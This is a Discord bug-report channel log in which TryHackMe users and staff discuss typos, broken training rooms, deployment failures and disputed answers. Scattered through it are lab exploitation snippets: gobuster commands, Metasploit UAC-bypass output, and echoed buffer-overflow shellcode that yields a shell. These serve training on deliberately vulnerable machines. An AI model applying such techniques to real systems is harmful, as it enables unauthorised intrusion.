#site-bugs

Ah shhiititt

Just rebooting (battery has died on said laptop, just moved downstairs).

I have an old install of Kali on another VM.

What updates have you done? I used to be a web dev

Its my obfuscation methods

Hmm

I can revert it I guess

I just need to know where its breaking

So on the console it will kinda say

Whats causing the browser to break

Best command to run for that info?

Its in your browser console

Right click, click inspect

Then there is a tab calle "Console"

Hahaa, ohh that console 🤪

Just loading the VM back up

It’s been a long day at work 🙄

aha thanks 🙂

can you leave the VM up too?

I will see if I can fix it 🙂

Yeah no problem, just out having a cig then I can be around to test as much as you need 🤟

awesome thanks 🙂

Will me connecting to the vpn help in any way from your end?

no

Shift F5

Clear your cache and try again

https://tryhackme.com/js/script.js

Load that file

Just go to it in your browser

And try come back again 🙂

Less errors but still spinning

what line?

Can you copy the sort of line on that please?

Just taken my dinner out of the oven, I’ll be more on it properly in ten 🤟

Ok ty

Small typo, likely missing a word

🤔

majority of top 10 users by scoreboard of https://tryhackme.com/room/bpsplunk haven't answered #2.17. is the question too elusive?

I hope not haha

I put that question in there as one of the less technical items, it's just not super obvious from the help menu

i'm thinking something's got to be up with that based on stats from the scoreboard. numerous people have answered every question but that one

looks like a few question on the room chat including the most recent are related to that question as well

I can tell you the question is worded almost nearly as you would find it in a splunk textbook as I reviewed one of my books when making that room

The hint I'll provide is: p**** t****

would it help to add a hint to that question (within the webUI)?

Done

thanks! now to watch the numbers on the scoreboard and see if that did the trick 😉

Haha yeah

small typo in the upload page: We are uploading your file. Please be patient, manually refreshing this page will destory <<[typo here] all progress..

God, I gotta find a XSS on THM xD.

Realistically I need to talk to Skidy about a web app for it

Rather a pentest on the site

^

xss room has err_connection_timed_out errors for me fairly consistently. esp reproducable under the Filter Evasion section, I can't "submit" new attempts more than 2-3x in a row without the room timing out. happens across ff/chrome on diff computers and ISPs. also across multiple instances of the deployed room across 3 days.
a second item to note is that under tasks 8.3 and 8.4, i've got several variations that meet the objective of displaying an alert with "Hello" but don't yield a flag afterwards. happy to give examples in a DM if anyone wants to add those to the corpus of accepted inputs for future users

Hey, yeah the XSS room has problems that I need to fix when I get time.

Sorry for that

Vulnversity Task 3 about gobuster does not list the subcommand dir: 'gobuster -e -u http://<ip>:3333 -w <word list location'

gobuster dir -u http://<ip>:3333 -w <word list location

try this

Just updated the task 🙂

Thanks

Yes I figured my way around it I just wanted to submit it so it could be fixed. Thank you both @tawdry totem @frosty cape

I only have a few minutes at a time so im still on vulnversity is Task 4 #3 written correctly? I found the area but to me doesn't seem as described

"Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.

Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so"

I think it should be Intruder > Positions > Attack Type: Sniper ... Because Payloads tab is different.

The Linux CTF two of them u cant do

Which ones @slow sphinx ?

think it was 26 27

cant remember off the top of my head

@frosty cape

could you update the room, playing with my OCD ngl aha that ive done it but its saying I havent ah a

Flag 26 and 27 are solvable ^^

Currently no one able to solve flag 25, Imma trying it

@tawdry totem

Oh yes?

I am try to find Flag 26 or 27 in Linux Challenge

@tawdry totem I am almost certain that I stumbled across flag26 or flag27 while I was looking for another flag.

Alright, will pm you now. Plus, this is not the correct channel. This is a bug reporting channel.

sorry man

Guess its been discussed already. But the “add 1 hour” option is not working(at least for me)

What do you mean?

Does nothing happen?

Just tested it, seems to work for me

What happens when you try to extend?

extended with around 10mins before the machine expired

and even though i extended it, it closed

yeah, there was no problem form e

for me, spawned a new one

oh right? Has anyone had this problem?

When you extended did it say the expire time was in 1 hour?

Yup

Spelling error (https://tryhackme.com/badges)

Fixed thanks for letting me know

https://tryhackme.com/room/ccradare2 Issue with task 2, question 4

Answer should be -- rather than -

@covert kernel

To explain a little more, all the other answers needed the - prefix so this shouldn't be an exception

O

Thats a whoopsie

Ayy, glad I could help. Otherwise, really enjoying that radare tutorial @covert kernel

:D

seeing an issue where I can't deploy VMs in new rooms

steps to reproduce:

1. join room
2. click "deploy"
   a. see Starting your machine.. please wait! banner
   b. nothing ever happens
3. If I refresh browser window, no IP info is available and the "Deploy" button is green again for me to select

also can't seem to terminate my VM from the heartbleed room. perhaps the two issues are related?

I'm having the same issue with deploying the PowerShell VM

No bugs, AWS DNS is having problems.

This should be fixed very soon

Hey. Just noticed something not important.

https://tryhackme.com/manage-rooms

Perfect thank you. I won't blame my incompetence yet

And also

https://tryhackme.com/room/juiceshop

bruhh

Our infrastructure providers are experiencing a temporary issue, for now you will be unable to deploy machines. We apologise any inconvenience, feel free to reach out to us!

For now, don't forget you can do any of the machines where you don't have to deploy a machine or any of the rooms where the VM is publicly available (i.e. any of my rooms where the download of the vm is available on https://darkstar7471.com/downloads/

Okidokies noice

I feel like typos don't belong here, somehow

Thanks for reporting them 🙂

I will update in due course

You are welcome, cool :)

A typo. Nothing serious! :)
https://tryhackme.com/room/juiceshop TASK4; HINT

https://tryhackme.com/room/vulnversity I think the flag -u is wrong for gobuster in the version that's in the kali repos at least

Unknown shortform flag

in fact, the whole command given won't work

gobuster now needs you to specify what you're trying to bruteforce

Ok, you can specify -u if you specify the type of scan

So you need gobuster dir -u <target> -w <wordlist>

Latest version here

Also, the answer for what extension is blocked

txt files are blocked, with the message that that extension is not allowed

So is zip

And png

Everything so far reports extension not allowed

what common extension 🙂

Skip that question and come back to it

It will make more sense after maybe

They're all common extensions

Oh it wanted a . prefix

Well, the gobuster point still stands

Bugged time since posting? Was at 2m ago last night when I checked this last. Not sure if this is known yet

I have only completed the first 10 tasks of the c4ptur3-th3-fl4g room but it seems to have bugged and decided I've finished all of it

The other sections aren't showing the tasks. I've replicated this in a few different browsers

@mortal root try leaving the room and rejoin quickly, see if that resyncs the tasks

It's likely due to the age of the room that it's glitching out

weird, that fixed it. cheers @rugged ermine

yup! Glad that worked and that I could help haha @mortal root

By the way, what level at you right now @mortal root ?

I can get your tags updated in the discord 😛

0x9 - I've been so busy finishing uni/interning that I've fallen far from grace :p

You can also DM me any certs you have and I'll get you tagged accordingly

so now I have a little bit more time I'm trying to regain ground

no worries! I'll get ya tagged right now

there ya go

awesome thanks 👍

@rugged ermine seems to be a recurring issue, just joined another (much newer) room and as soon as I joined, same issue

no

oh wait

i had the exact same issue

i just thought none of those had questions

Hmmm, this is very weird

I will look into it

Thank you

@mortal root Problem has now been fixed - sorry about that!

@shy pond ^

timezones seem off for me, can't see anywhere on my profile where I could change it

for reference I'm in the UK now (10:50PM)

I am too in the UK

No issues for me

It uses your local clock

So if you're using a VM, is that VM's time zone set to GMT?

yup

Ooo

Okay thats really weird

my date format there is also US format

whereas yours is UK format

Can you change it to UK format?

Just to see if that fixed it

If so I will try find a solution

VM has always been set to UK locale

weird

Oh sorry, yeah

Hm

Okay thanks for reporting, I will investigate

doesn't affect functionality anyway 🙂

What browser are you using? And whats its version number?

Yeah but is annoying for you aha 🙂

Ill get it fixed

Firefox 60.8.0esr 🙂

Finished the window bof box, nice box btw. However, I found a small bug in the description.

The EIP should be reverse due to big endian.

Took me sometime to figure it out haha.

Heck! And I almost thought it was perfect

I even had it right in my script!

Dead link

Now gimme the award >;)

Is that considered a bug?

In this case, kind of. This is a known bug as that page is somewhat deprecated. Realistically, for the Bug Hunter award I believe we're looking for major errors in the site overall (not to be a wet towel of the conversation)

That page realistically needs a revisiting and it does have it charm

@rugged ermine You have a typo in RP:metasploit in the Initialising section

Should be msf, not mdf

Additionally, q6 on Task 5. it asks for the full path but you need to enter it without the exploit/, which means it's not the full path

I'll add exploit on it, good catch on both of those haha

@rugged ermine Good room though, I felt like I learnt a lot because I've been avoiding msf as it makes me feel like a dirty skiddy

While a lot of people consider MSF to be easy mode, it's an essential tool for even stringing together other frameworks

The other frameworks part I should have realistically alluded to in that room but I tried to keep it mostly essentials-focused. You can pretty much throw whatever you want in the payload and get things like Cobalt Strike, PowerShell Empire, or even Silent Trinity involved. Metasploit is a framework that is stupid powerful

@rugged ermine Yeah, that's why I want to learn it. But I'd rather learn the 'real' ways alongside

Fair haha

Fixed both of those bugs/typos

This page is now out of date, as HB2 happened

Oh goodness, my team is listed on that page still lol

yeah, it's the highest scoring team

Updated locally, will be made live this evening.

Skidy with the ninja edits lol

...I just got dabbed on by Skidy..... Oh lordy

lmao

Aha yea

Uh-oh

The reverse-a-roo

oh lordy

@rugged ermine

There's another, but it's not python

it's powershell

@spiral flame There are multiple for that and it's actually grepping for the correct answer there

Not the best screenshot but that's from the control panel

That's not a module that's listed!

Reee

I had that mentioned to me just a bit ago, it's been retired unfortunately so I'll just change it

I'll go back and grab a screenshot

I just updated the room lol

Is the cryptofun room supposed to have more than 1 txt file for download?

for Task 1

Uhh... LanSharks2 on the 2nd place.

Hehe as it should be @earnest solar

I agree @rugged ermine

Still needing 1 more member xD

If anyone wanna join, you’re welcome. Just PM me. A beginner or an experienced user, doesn’t matter

Am I qualified?🤔

@earnest solar

Ofc

Sending you the team pass in a minute

https://tryhackme.com/room/xsschallenge This room has stopped existing or is private, but shows on profiles

https://tryhackme.com/p/chris.dinozzi

In Fowsniff CTF Task#1.10 is In the email, who send it? Using the password from the previous question and the senders username, connect to the machine using SSH. This should say the recipients username, not sender.

In KnockKnock question 3 is looking for the wrong answer. Either the question should be reworded for the answer thats currently considered correct, or the expected answer changed to match the current question

In room Biohazard, when you obtain "crest 4" there are two hints that are described as being related to "crest 2" when in fact they're for "crest 4"

@tawdry totem that one would be for ya

In room Alfred question #1, The answer to How many ports are open is incorrect, there are double that amount of open (and responding) ports

In room Kenobi, question #2, The accepted answer to, Scan the machine with nmap, how many ports are open? is incorrect as there are 5 additional ports open. The question is assuming you're not completing a full port scan and only using nmap's default port list

I'm getting a connection error on the ninjaskills room

I'm connected to the VPN

Ignore me, now working

Yeah sorry, it takes up to 3 minutes to boot!

Isn't it should be fire away!

@spring heron thank you for the solid QC on the rooms as you go, helps us go back and catch small things ❤️

In /room/cryptochallenges Task #8 successfully decrypts but is not the accepted answer. Additionally, the given answer format of "12char 4chars, 3chars..." doesn't occur as a pattern anywhere in the decrypted text

@spring heron additionally, the XOR challenges need to be decoded from hex first

After completing the RP: Metasploit room, it doesn't seem to be showing up in my list of badges

I tried leaving and re-joining

not a huge deal, but wasn't sure if anyone else had this prob

@sturdy halo I don't think there's a badge for it

room awards

and then on the badges page

Yeah actually, I don't have that badge

Skidy can likely get this taken care of in just a short bit

cool, thanks

In a room, its not showing you have the badge, but what badge is available

I can see why it looks confusing

It looks like you're going to get the badge.

But its just showing you whats up for grabs

It will earn you that badge

@frosty cape I did the room, and didn't get the badge

oh sorry, AFTER doing the room

yeah, I completed the room as well, but didn't get the badge

@skidy bot is ded

@frosty cape

@delicate dragon

Why'd ya kill the bot?

;P

@delicate dragon

Ill take a look guys regarding the badges sorry

Ooooo

Its because, I added the badge a few days after the room was released

So it wouldnt have updated for you

Please DM your username me and I will add the badge to your account!

I didn't

I haven't even logged in to server since a week

(I'm just giving you a hard time)

:p

I'm gonna implement the auto subscription role assign feature

But seriously, how did it die?

No idea, I haven't peeked at the console yet

Oh

@delicate dragon do you have a DB set up so !rank can detect who you are yet?

It's in progress, since the new feature Skidy implemented will give you a token which will help you to verify as it'll help you to change roles accordingly, as soon as you get rank there, yours will be updated here.

Might take a while since I have exam, but will be implemented this week.

Oh cool. Looking forward to it and good luck with your exam.

Thanks

In Brainstorm room i can't get a response from the deployed machine, tried resetting it several times.

In room Goldeneye Task2 question 3: Inspect port 55007, what services is configured to use this port is looking for the wrong service name than what is actually responding on that port

In room WebGramming Task 2 "Repeat" the service on port 19001 is insanely unstable and requires multiple re-deployments while interacting with the service due to crashes

Ok, giving up on WebGramming until it can be looked at. The instability isn't limited to Task2 that I mentioned earlier and effects all the tasks. You have between 1-5mins before the app crashes and stops responding for all the tasks.

@spring heron I had the same issue with GoldenEye months ago - I think it'd be good if we had a better way of tracking room issues/alerting authors

Because I know how frustrating it can be when you've already invested time into a challenge and you reach a roadblock that shouldn't exist

+1 for issue tracker

I've dropped it in #544951750801752079 🙂

Looking at the room, seems like there's been 0 completions in ~6 months, maybe in addition to issue tracking, gathering analytics about user engagement with rooms would be good

like completion times, most hinted questions etc, would help identify issues people don't report formally and help content creators improve their submissions

Also maybe a code escrow for rooms. So if a contributor is no longer active but the room needs care/feeding it could be made available for a new maintainer to take over

Hmm yeah I guess there's a weird ownership issue there, once an OVA is uploaded to THM it's no longer retrievable by room creators (correct me if I'm wrong). Also don't know if there's a particular term/condition of who owns the rooms/VMs once they are uploaded to THM

But yes, I think a good example is the "Cardboard" challenge in HackBack2. There's a known issue with broken port knocking on there, but it seems there's no way it's going to be fixed

"2. Use License
Unless explicity stated or credited, users are assumed to own the material they used to create a room." - so I guess in its current state, THM would need to have a new policy where rooms can be modified after submission with perhaps an opt-out? And then ask existing content creators if this can be applied retroactively

hmm, yeah

In room HackBack 2019, Task 4 (Jurassic Park) it doesn't appear that Flag4 is being generated (unless the reference to it is a red herring). Same within the Jurassic Park room as well obviously.

I beat on flag four for literal months

|| it's a red herring, there is no flag four. I have the actual flag four hash that I had to ask for originally, let me know if you want it ||

In room Intro to x86-64, Task 6:CrackMe, the logic in the binary is flawed and accepts multiple values as the correct password, as long as the first 3 chars are correct

That's the point.

It says what are the first 3 chars of the correct password

The question is What is the password? and the answer format was ***.*.*.*

Task7 has a similar issue, the binary accepts a single character and responds that its the correct password

@spiral flame I read back thru the room and dont see where it says what are the first 3 chars of the correct password, nor in the prompts for either binary, enter your password and Please enter password

Might be thinking of a different RE course on thm then

Error in Windows BOF. ```This tool is called pattern_offset.rb

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -h

pattern_offset != pattern_create.rb

Bug in powershell. Get-Command | measure returns 7935. Deskel's writeup says 7935. Submission doesn't accept that as answer 😦

Soooo

UltraTech Task2 Question5

https://imgur.com/242Uvb7.png

the submit button doesn't work

pressing submit and there is no "Correct answer" nor "Wrong answer" popping

tried with UBlock disabled too

it's odd because the other worked. Tried in a different room and those worked too

I managed that the other day... Interesting

Just tried Chromium instead of Firefox, same thing

guess it got buggy

@earnest solar Ah you're right, I will look into this later this week

Cool

All the tasks in WildFireCTF appear to be broken

What task and question number @vocal raptor ?

@sly raft for windows BoF, task 3 question 6. the tool we use does not match the name of the command it says to run. For powershell, task 3 question 3 🙂

I think this is a typo, should say vmdk?

You're correct, it should be vmdk

(this is on the landing page when you're not logged in)

In room Toolbox: Vim Task3, Quest 6 the accepted answer isn't the correct one

On the THM Blog there is a write-up for Zeus, but the link leads to "Owner has made this room private"

@rugged ermine I think that your room?

I think we made it private as we're seeking permission from the original VM creator.

@spiral flame Thanks, updated! The change will be made live this evening.

In "HackBack 2019" Task 14, Quest 1: there is nothing in the provided pcap that would be an indicator of the accepted answer, and is more of a guess based on the description of the task.

In the room ICE is the accepted answer for the CVE correct?

Yes, at least for me

I got a 2004 one

And that's what the msfmodule lists as the CVE that it's using

But thats not the correct one based on question #1

But it is the correct answer based on what you're actually doing

The exploit you pop

the 2014 CVE isnt RCE nor is it a cvss score of 10

2004

Not 2014

There might be 2 CVE's for the same vuln

I remember Dark complaining about when that happens a little bit ago

I mean I had CVE-2004-****

@tribal knoll nope, two different CVEs one is buffer overflow with score of 7.5 from 2004. The one described in question #1 is RCE from 2001 and had a score of 10

I mean they're right, the only 10.0 score cve is the 2001 one

@rugged ermine So yeah, this is actually an issue

nvm just realised this is bugs and not room help smh

Could switch the number 10 to “Rated as critical”

but you'd also have to change the accepted answer for #1 since the 2004 CVE isnt RCE

Yes it is

execute arbitrary code

Guys hate to tell ya, I know it’s a room intended for learning but you’ve just dropped the answers in here

This is bugs

I thought it was room-help at first tbh

@spiral flame its a BO that can lead to RCE

Deleted my spoilers

It gives you RCE, it's classified as Execute Code,Overflow

I know it’s bugs. But regardless you have posted the cve

Which in turn spoils the question it asks

It's normal to spoil answers in bugs

Very normal, scrolling back

You kind of have to, if your answer is right and the accepted answer isn't

Thats RCE via Buffer overflow. Straight-up RCE would be something like Vulnerability Type(s) Execute Code

It's still RCE

The outcome is you get to run code

The results of exploiting a vuln isnt what dictates the vuln type. A BO can also lead to DoS , but I'll agree to disagree. 🙂

You legit both just said the same thing but reworded nvm I can't read ignore me

I should double read stuff before I open my mouth 😅

Has anyone had success with priv escal on ICE?

I did when it was RP metasploit

Multiple attempts, with multiple redeployments , all failed so far
MSF versions:

Framework: 5.0.61-dev-
Console  : 5.0.61-dev-

From Ubuntu 19.0.4

I didn't get it to work either

also msf5

Can an admin check to make sure msdefender isnt eating them? 🙂

Pretty strange, seeing as it worked on rp metasploit and this is the same VM afaik

I can assure you that box doesn't have defender

all of my testing was done using the THM-hosted version of the box and it all does work

welp, as the saying goes... 64th times a charm. Finally popped second session

Speaking directly as the developer, Ice is my most thoroughly tested room. Some of the items in it can take a few attempts but that's just pentesting in general there

👍

@rugged ermine Did you see the chatter early about quest #1 and 2 under task 3?

I can check on that now

I did not previously

Resolved, it was a misalignment specifically from myself looking at the CVE's associated with Icecast. If you check https://www.cvedetails.com you'll find Icecast is plagued with CVE's and I had misaligned that between the two sources I had looked at.

I've adjusted the wording on the vulnerability type question as well. While I consider this to be RCE, I'm using the wording now on CVE Details to avoid any confusion

👍 Nice work @rugged ermine, the rest of the completed as expected. The badge is fitting given the season 🙂

Thank you 😄

Thank you guys as always for the fine-grained checks on the room, helps me maintain them and provide clarity

@rugged ermine remember to put the VM files on your site asw

^Yup yup, I have to compress it but I'm in the process on doing that today

I have to update my rooms to have links to the download page

tyvm for the reminder of course

Any idea why priv esc is escaping me?

What architecture is your shell?

I tried both x86 and x64, x64 wouldn't give me a shell

x86

^do that

For me I'm assuming most of it was related to my migrating my CTF workstation build to 19.04 and working out the kinks

the suggestion engine doesn't work super well on x64

I got the exploit, just would never give me a session

Good to know though since other people will undoubtedly hit similar issues

[*] Exploit complete, but no session was created.

do you have your LHOST set correctly? I had that happen a bunch

one other thing to keep in mind is that LHOST isnt global, unless you specifically set it...

it might not be 'catching' it

I set LHOST to both my tun0 IP and tun0 itself

It was binding properly

hmm

I can also give you the local version of the box in a short bit, that might help

(could I also get a rank up real quick, 0xD now)

done!

|| [] Started reverse TCP handler on 10.10.14.2:9001
[] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[] Configuring payload and stager registry keys ...
[] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[] Cleaning up registry keys ...
[] Exploit completed, but no session was created. ||

Is 10.10.14.2 your TUN0 ip? Mine is always in the 10.8.8. range.

Uhhhh

^I think your catcher and pitcher might be flipped

That's HTB isn't it

yeah lol

hehe

oihuj;aerg

welcome to Friday!

xD hey at least we got it

I need another red bull

and to manage my damn openvpn connections

@rugged ermine So if the privesc doesn't work, I have to redeploy the machine?

My biggest pet peeve right now is MSF 5 not catching ctrl + z properly anymore

Sometimes, it will work most of the time and a lot of times you can just rerun the exploit @spiral flame

I'm just rerunning it atm

on attempt 3

attempt 4

@spiral flame double check lhost, its not global by default

it's set correctly

to my vpnip

Ok

In HackBack 2019 Task12 question 8. What site did the user go to? Answer with the sites FQDN the accepted answer format isn't the FQDN that the user accessed. Edited for clarity

And same task question9, Look at all downloads in the pcap, who did this user download a photo of? There are only two downloads in the pcap and both are a 1x1 gif. Or is there an deeper puzzle here that I'm overlooking?

Yeah I don't think anyone solved that one @spring heron

That last one at least

there are quite a few that appear unsolvable in that room due to various issues, I have a running list that I'll post once I've done as much as I can

@spring heron yep, and the same with hackback2

Would you guys be interested in beta testing? This would be for my content specifically (primer rooms, etc)

@rugged ermine yes for sure!

I would be up for that too 🙂

Me too!

More I can learn, the better

I'll make a chat in just a bit for beta testing, I'll invite y'all

gotcha!

@rugged ermine 👍

doing the mrrobot room and when you get to wordpress it kinda shits the bed
pages taking like 5+ mins to load
sometimes not even loading
me and the bois have uploaded a reverse shell, but we can't even load the page to trigger it

#room-help would be best here ❤️

I didn’t have this issue tbh

@hollow arch you have a typo on the main page of djinn

on the webserver page

let's see how good your are

Also, I think it actually asks 1001 maths questions

Python loop goes till 1001 meaning it will stop on 1000

https://tryhackme.com/room/kali can't complete the 2nd (duplicated?) question REEEEE

@hollow arch my script loop counts 0-1000 inclusive so there's 1001

@neon zealot This is so weird.

Erm, when you're online again this evening please let me know and I can check what the issue might be

@frosty cape UltraTech still doesn’t validate task 2 question 5 answer 🙂

The question about number of REST routes?

Yes

Hmm, validated for me. I just dont recall which day I solved it on to comapre results. Was in the last 20d tho

Tried validating it about 1 week ago

It validated for me

I just reminded Skidy to look into it xD

IDK if it was correct

But I tried a few different values

I tried different browsers

I don’t get that pop up

Ehich says its wrong or right

Oh, interesting

so the issue you're having is unrelated to the answer

Tup

Yup*

Chrome on MacOS here

I tried chromium & firefox

And is the only room where i’m havin this issue

@hollow arch @spiral flame yeah, counting the one that is sent with the initial connection there are 1001 operations

oh

as far as I remember I was running the loop till 1001 so I thought it might be 1000

999 - b" (3, '-', 1)\n>"
1000 - b" (2, '+', 8)\n>"
1001 - b" (7, '*', 2)\n>"
[*] Switching to interactive mode

Not sure whether to put it here or feedback but it says "Horay!" when you deploy your machine, should it be "Hooray!" or do both work?

Hooray is at least the more accepted spelling

idk if the other is correct

https://www.urbandictionary.com/define.php?term=horay

lol

Where did you see that @neon zealot ?

In rooms?

If so, I have just updated it. The change will go live after lunchtime today.

Urban dictionary LOL and yeah in rooms when deploying a machine

and TY ❤️

Hurray or hurrah

Still can't seem to pass https://tryhackme.com/room/kali

The question seems to have duplicated for me, and when I click "completed" it says it's the wrong answer

It's duplicated that question

Wondering why it wont let me answer it though

Leave and re enter the room

tried, still there sadly

Interesting. It's happened to 2 different people on 2 different rooms recently

I guess for now I'll leave the room cause it's messing up my "rooms in/rooms complete" ratio

Ahhh, I thought I had fixed the duplication bug

When did that start appearing @neon zealot

X-posting from #room-help
Can an admin check the network/firewall setting for when WebGramming is deployed? When it first deploys its reachable from outside THM VPN, then becomes available only from VPN, then a few minutes later stops responding altogether, including pings

I noticed it yesterday

Just checked again today and it's there

maybe it only fixes for people who don't have any progress in the room?

Erm, when you joined the Kali Linux room, did it bug out?

Anything unusual happen?

Nah everything was normal

But I noticed the duplicated question

In room Intro to Windows BoF Task2 Question 5, What is the name of the Administrator account?

Should that be What is the name on the admin account vs "of"

No, the grammar works fine as it is

I'd argue "on the admin account" is less correct

But the name of the admin account is Administrator, no?

I don't know without doing the room, but it varies by windows install

Windows account have a "Name" like Administrator and a "Full Name' like Jim Smith.

The accepted answer is looking for the value of the "Full Name" of the admin account

Then that might be a better way of asking the question

Full Name, rather than username

Also on the same room Task3 Question 1 How many ports are open on the box? The accepted answer is for the number of ports detected by a default scan of nmap and not that actual number of responding ports.

@frosty cape space required!

thanks

Updated, will be live tomorrow 🙂

@frosty cape

Yeah fixing all spacing issues on that page 🙂

@wise epoch users' means belonging to several users

It's valid here

@frosty cape shall i send all or you are reading it again?

I am re-reading it 🙂

Ah! apologies i made you re read it!

Nah needed to be updated, so thank you! 🙂

Welcome :))

The 'S' shall be capital?

Hey @frosty cape I think I need to dm you about something

It might be chrome being dumb actually

Nvm, 99% sure it is.

(sorry)

https://hackers.attacked.me/khuDTgolb7fo.png

Imma take a guess that col should be there

X-Posting
Not sure if this falls under #room-help or #site-bugs but the subscription-only room Buffer Overflows is brutal
The description is Learn how to get started with basic Buffer Overflows! but the last two challenges would fall in the expert category due to a disassembler not being installed in the deployed room
I've spent 5hrs this morning attempting it by utilizing strace to determine some of the address locations and can get to the point of controlling RIP, but even with a NOP sled of 60+ its a guessing game to determine the stack pointer in order to hit the sled

Additionally, I tried compiling GDB but it doesn't appear as the redhat dev toolkit is installed either since the current compiler doesnt support C++11 (I also believe the toolkit installs GDB)

About 6hrs in I finally have code execution, will work on swapping in shellcode when I'm back from an event tonight.

Here's a program that echo's out your input
��������������������������������������������������������������������������������������������������������������������AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG����

Trace/breakpoint trap

Another update... finally popped shell but the SUID doesnt appear to be functioning

Here's a program that echo's out your input
��������������������������������������������������������������������������������������jBX��H�RH�/bin//shWT^I��I��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG����
bash-4.2$ whoami
user1

Should be user2... this def isnt a beginner challenge 😛

Did you actually run it as sudo?

wait no, I'm dumb

Ignore me

No worries, my mind is fried from this one so any dialog is welcome

I flush the ENV prior to exploiting so I get a consistent stack, I'll have to look into how that impacts SUID execution, I wouldnt think it would

hey @spring heron

i'm so sorry about that - I was quite sure that r2 was installed on there

uploaded the image to have r2 + gdb on there

so it should work fine

^ i disabled ASLR + Canaries when creating the challenges so the addresses should be static O.o

Thanks @sly raft, there should be a badge for getting shell using only strace for analysis. 😂

Are the absolute links to localhost on the BluePrint website intentional?

@spring heron yes they are. You’ll have to dig aaaaa liiittle deeper

omggg did you pop a shell using strafe @spring heron ?

Also if you're using another program to run shellcode like gdb/strace it would use the SUID bit of those programs instead of the actual binary

Which is why you use those programs to test if the shell code works, add a bunch of NOP sleds to make it reliable, and run it using the binary

So the login page, it says username or email. I tried with my username and it didn't let me log in.

Worked with my email

I'll investigate:)

@sly raft I used strace -i ./buffer-overflow ... to aid in "brute forcing" the stack address and then ultimately popped shell with env -i ./buffer-overflow ... but it didn't retain SUID. When I'm back from traveling later tonight I'll give it another try without wiping ENV

some elements are not responsive

Ahhhh, I will update this tonight. Thanks for reporting :)

Btw I haven't tried chrome mobile, only firefox mobile

All good on Chrome

Except maybe the Team buttons

Do you have "request desktop site" on? @remote laurel

Oh mb, I do :')

I bork

Should the button say add writeup instead?

Yeah the only thing is... the site is not really intended for mobile. Its on my to-do list, but I can't imagine anyone using the site on their phone... unless they're ub3r l33t.

Ah yeah!

Updated, will be made live tomorrow 🙂

A very large portion of the world only use mobile, while it's unlikely there are people who do use sites on mobile that aren't made for it (IE Free code camp https://www.freecodecamp.org/news/how-i-went-from-programming-with-a-feature-phone-to-working-for-an-mit-startup-40ca3be4fa0f/ ). might be a nice unique selling point. hard to imagine kali on a phone, but termux exists or they might just want to read the walkthrough rooms 🙂

Oo @vocal raptor yeah I had not considered that. Thanks! I'll make the site much more mobile friendly in the near future 🙂

@raw karma is ded in #648878292551598080

Keeps saying @invalid-user.

Room BrainStorm Task#2 Quest#2 How many ports are open?
The accepted answer is twice the number of listening ports.

@covert kernel In your reverselfiles room, I think task 5 has a typo on the prompt. Binary would print "Good Game" not "good job"

Thanks man, I'll change it

(I might be wrong)

@rugged ermine Is joystick meant to be unbearably slow, on the terminal?

It's kinda sluggish since it's running a game server

Does it just not have enough ram or CPU?

No idea, likely ram

it's already been bumped once

@rugged ermine can RP nessus still be ran with nessus 8?

Yeah, there's not any major difference there between the versions

Then I'd suggest changing the "Nessus 7 Manual" to "Nessus 8 Manual"

If it needs it I can give the machine more resources

I was just thinking that haha, I need to change that room

Not yet dark!

I've been working on updating my content the past few days of course

lemme complete it first

Also probably add a warning saying "nessus can take HOURS to install once you get to the web ui, you're gonna wanna leave it for a bit"

@rugged ermine Does VulnOS2 even exist on THM?

Ah has been made private

Hey @frosty cape Heartbleed is a part of Hackback2019 (Task 7), so should the room still be private?

^ room is private because it's a full break down of the vulnerability

Ah ok

This is what the sub page looks like on mobile

Alignment seems off

Seems like the name should be above

Ill get on that, thanks for letting me know

Added to me to-do list

Im just getting connection refused, multiple instances now

Where?

New christmas room

Gotta wait for the web server to start @cosmic glade

And you can't run multiple instances at the same time

Also make sure you're either VPN'd or using the THM your own kali box

I'm VPN'd, it's been minutes since server deployed

Normally the rooms come up in less than 60 seconds

is port 3000 correct?

yes wait for it to finish deployment

it takes time

Alright thanks, that was a while but it's finally up

@frosty cape https://tryhackme.com/room/corp VM is showing token=undefined upon deploying

pinged Skidy in particular bc I know he's looked into that same issue before. and actually, happening across rooms for me now (Kali room as well)

https://tryhackme.com/room/kali This states 30GB memory, it should really say 30GB disk

@spiral flame was that comment for me?

Nope.

Seperate issue

👍 thinking again how discord needs threaded convos

Discord is like irc, irc has the same issues.

yes, though Slack and MS teams setting the standard w/ convo threads

For the second prompt, when doing the thing to find the fixed value, my first one was actually missing part of it. it was missing the last three characters... (Tried saying this in a way to not give out spoilers)

Is this a bug? Mine worked properly

It was a certian name that screwed it up

by adding invalid bits to the encoding

asd

added a 7 to the end

Santa didnt keep the last 3 characters

In the Advent of Cyber Task 5 Q#2 _
If you decode the cookie, what is the value of the fixed part of the cookie?_ the accepted answer will take a partial answer

That's intentional

There's some regex involved in every answer

👍

Hello, i think there is a bug on "vulnversity" challenge, in Task 4 they tell us to " Try upload a few file types to the server, what common extension seems to be blocked?" so only 1 should be blocked, but it seems that they are all blocked, even if i have found the solution

Only one will be accepted rather

One of those extensions will work (hint it's the weirdest one)

Ok thanks 😄

@frosty cape can u check the UltraTech room? i cannot submit the answer for Task #2 question #5

UltraTech is broken for the time being - I will fix it when I have a spare 30 minutes

I will be making this room private for the time being

Sorry @next anchor - I will take a look at fixing it now actually

@earnest solar Ah I understand now

Leave the room

And re-join

That will fix your problem

oook

worked now xD

Question duping is getting worse

Or sample size has gone much up and people are reporting

Advent challenge VPN IP addresses login breaking on callenges is big bug

Minor time formatting bug in chat:

@frosty cape are you author of corp room? Trying to figure out who can fix the room (specifically last question logging in as admin since the admin account password expired in mid november)

@rugged ermine

Well poop, Skidy will have to catch that one with the box name

<@&568449888682246145> q1 is incorrect

day 3

Is anyone else experiencing that issue?

nope

@neon zealot That CHristmas capital is fixed

Also, I have a bunch of trouble logging in.
I reset my cookies every browser close, would this be an issue?
It says I'm using the wrong username and password, but I have an account manager... I've reset my password like 3 times thinking I just misplaced it..

